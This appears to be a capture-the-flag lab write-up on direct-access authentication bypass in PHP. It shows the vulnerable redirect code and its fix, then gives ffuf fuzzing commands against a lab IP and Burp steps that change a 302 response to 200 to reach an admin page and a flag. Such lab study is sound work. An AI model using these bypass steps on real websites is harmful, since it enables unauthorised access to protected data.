this is the most straightforward way of bypassing authentication checks. this method requests the protected resource directly from an unauthenticated context. attackers then accesses the protected information if the web application does not properly verify that the request is authenticated.
#original vulnerable php code
#This code redirects the user to /index.php if the session is not active/user is not authenticated - However, the PHP script does not stop execution, resulting in protected information within the page being sent in the response body
if(!$_SESSION['active']) {
header("Location: index.php");
}
#mitigation
#To prevent the protected information from being returned in the body of the redirect response, the PHP script needs to exit after issuing the redirect
if(!$_SESSION['active']) {
header("Location: index.php");
exit;
}
#
root@oco:~$ locate web-extension*
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/web-extensions.txt .
#identify the extension the site uses
root@oco:~$ ffuf -w web-extensions.txt:FUZZ -u http://94.237.62.184:39910/indexFUZZ
* .php [Status: 200, Size: 2971, Words: 638, Lines: 97, Duration: 4328ms]
root@oco:~$ locate *directory-list*
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
#fuzz for admin pages, etc
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.62.184:39910/FUZZ.php -t 100 -ic
admin [Status: 302, Size: 14465, Words: 4165, Lines: 429, Duration: 77ms]
* the output may list different sizes
- size 0 means no content or empty page
- size > 0 means the page contains content
#verify identified pages
root@oco:~$ curl http://94.237.62.184:39910/admin.php
#intercept requests and test for direct access authentication bypass
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
BURP > Proxy > Requests > right-click > Do intercept > Response to this request > Forward
Request
...
GET /admin.php HTTP/1.1
Host: 94.237.62.184:39910
Cookie: PHPSESSID=e4b4gmh75rbp9k90n2l23rfv39
Connection: close
BURP > Proxy > Response > Forward
Response
...
HTTP/1.1 302 Found // change this to 200 OK
Date: Wed, 25 Dec 2024 19:13:30 GMT
Server: Apache/2.4.59 (Debian)
Location: index.php
Connection: close
Modifications...
HTTP/1.1 200 OK
root@oco:~$ BROWSER > http://94.237.62.184:39910/admin.php
* HTB{913ab2d84b8db21854c696dee1f1db68}
